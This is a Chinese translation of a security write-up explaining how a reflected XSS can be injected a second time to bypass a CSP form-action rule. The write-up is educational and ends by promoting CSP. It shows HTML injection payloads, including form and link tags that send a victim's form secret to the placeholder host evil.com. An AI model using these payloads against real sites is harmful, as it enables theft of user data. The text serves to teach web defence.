利用反射型XSS二次注入繞過CSP form-action限制
翻譯: SecurityToolkit
0x01 簡單介紹
CSP(Content-Security-Policy)是為了緩解XSS而存在的一種策略, 開發者可以設定一些規則來限制頁面可以載入的內容.那文字中所說的form-action又是幹啥的呢?用他可以限制form標籤"action"屬性的指向頁面, 這樣可以防止攻擊者透過XSS修改表單的"action"屬性,偷取使用者的一些隱私資訊.
0x02 例項分析
上面講的太抽象了, 如果不想看的話可以直接跳過....具體一點, 現在使用的是chrome瀏覽器, 假設下面這個secret.html是可能被XSS攻擊的
#!html
//XSS在這裡, victim.com/secret.html?xss=xss
<form method="POST" id='subscribe' action='oo.html'>
<input name='secret' value='xiao_mi_mi'/> //小秘密
如果這個站點沒有CSP, 攻擊者可以直接透過XSS修改
#!html
<form method="POST" action='http://evil.com/wo_de_mi_mi.php'> //我的秘密
當使用者傻傻地進行"正常'操作時,小秘密已經悄然變成攻擊者的秘密了.然後,有一個管理員試圖用CSP防止這個問題, 他使用白名單策略限制外部JS的載入並且不允許內聯指令碼, 好像安全性高了一點.
攻擊者想了下, 把頁面改成下面這個樣子
#!html
<div><form action='http://evil.com/wo_de_mi_mi.php'></div>
<form method='POST' id='subscribe' action='oo.html'>
在原本的form之前又加了一個form標籤, 這個新的form標籤沒有閉合,並且直接碰到了老form標籤, 這個時候會發生什麼呢?
老form標籤就這樣消失了! 所以攻擊者再次把使用者的小秘密傳送到了自己的伺服器上, 而且這時本來應該是POST的secret因為老form標籤的消失現在變成了GET傳送, 請求變成了下面這樣.
這下管理員鬱悶了, 最後索性用CSP加上了form-action來白名單限定form標籤的action指向, 那麼這樣是否還會出現問題呢?
一起來回顧一下, 現在有一個不能執行JS的反射型XSS和一個只能往白名單域名(當然沒有攻擊者域名...)指向的form標籤.
原secret.html
#!html
// XSS位置, victim.com/secret.html?xss=xss
<form method="POST" id='subscribe' action='oo.html'>
<input name='secret' value='xiao_mi_mi'/>
最後攻擊者的改過的頁面如下
#!html
<input value='ByPass CSP' type='submit' form='subscribe' formaction='' formmethod='GET' />
<input type='hidden' name='xss' form='subscribe' value="<link rel='subresource' href='http://evil.com/wo_de_mi_mi.php'>">
// XSS, victim.com/secret.html?xss=xss
<form method="POST" id='subscribe' action='oo.html'>
<input type='hidden' name='secret' value='xiao_mi_mi'/>
</form>
這裡有幾處tricky的地方, 整個程式碼的步驟如下
input標籤的form/formmethod/formaction將老form POST到oo.html的secret變成GET傳送到secret.html即當前頁面.
跳轉後仍處於secret.html因此該頁面的XSS還可以被二次利用注入惡意標籤, 這裡又利用第二個input標籤增加GET請求的xss引數, 所以跳轉之後的URL變為
#!html http://victim.com/secret.html?secret=xiao_mi_mi&xss=<link rel='subresource' href='http://evil.com/wo_de_mi_mi.php'>此時secret.html再次觸發XSS, 被攻擊者加入下面標籤
#!html <link rel='subresource' href='http://evil.com/wo_de_mi_mi.php'>
正是最後這個link標籤洩露了本該POST傳送的secret, 攻擊者透過利用一個反射型XSS將CSP的form-action繞過.
0x03 最後
CSP能夠從某種程度上限制XSS, 對網站的防護是很有益義的. 不過相比國外經常能夠看到相關的討論,國內CSP的推進和熱度卻是比較不盡人意的, 同時關於CSP也有很多有意思的安全點, 特此翻譯出來以供大家學習和參考.
原文連結: https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/
相關文章
- sql注入之堆疊注入及waf繞過注入SQL
- 看好你的門-XSS攻擊(2)-利用反射型XSS漏洞 進行鍼對性攻擊反射
- 反射型 XSS 疑問及延伸(CSRF)反射
- xss原理繞過防禦個人總結
- PHP程式碼審計 XSS反射型漏洞PHP反射
- xss-程式碼角度理解與繞過filterFilter
- 幾種通用防注入程式繞過方法
- sql注入waf繞過簡單入門SQL
- RFI 巧用 WebDAV 繞過 URL 包含限制 GetshellWeb
- 淺談利用session繞過getshellSession
- 反射-通過反射越過泛型檢查反射泛型
- 教你一種繞過谷歌禁止反射的方法谷歌反射
- 4、幾種通用防注入程式繞過方法
- XWorkParameterInterceptor類繞過安全限制漏洞-解決2
- 利用反射機制實現依賴注入的原理反射依賴注入
- XSS 和 SQL 注入SQL
- 二十七:XSS跨站之程式碼及httponly繞過HTTP
- Oracle資料庫訪問限制繞過漏洞 解決Oracle資料庫
- MySQL許可權提升及安全限制繞過漏洞(轉)MySql
- Mac 0day被利用,可繞過Gatekeeper!Mac
- 2.2反射性xss案例演示反射
- js繞過-前端加密繞過JS前端加密
- 二次注入(SQL)SQL
- DIY 實現 ThinkPHP 核心框架 (十四)利用反射實現依賴注入PHP框架反射依賴注入
- 利用CMSTP繞過AppLocker並執行程式碼APP行程
- 使用DLL注入繞過“受控制的資料夾訪問”功能
- 繞過微軟限制,Windows 10 家庭版啟用印表機共享微軟Windows
- GoldenGate通過CACHEMGR限制記憶體利用Go記憶體
- 海外靜態住宅IP代理:繞過地理限制的完美解決方案
- 利用SEH異常處理機制繞過GS保護
- 利用反射代替switch反射
- 內容安全策略(CSP),防禦 XSS 攻擊的好助手
- 通過反射認識泛型的本質反射泛型
- 類的反射和依賴注入反射依賴注入
- 繞開Docker Hub下載限制:JFrog ArtifactoryDocker
- 駭客繞過防火牆利用Citrix漏洞入侵美國人口普查局防火牆
- Web安全攻防(一)XSS注入和CSRFWeb
- CSRF, XSS, Sql注入原理和處理方案SQL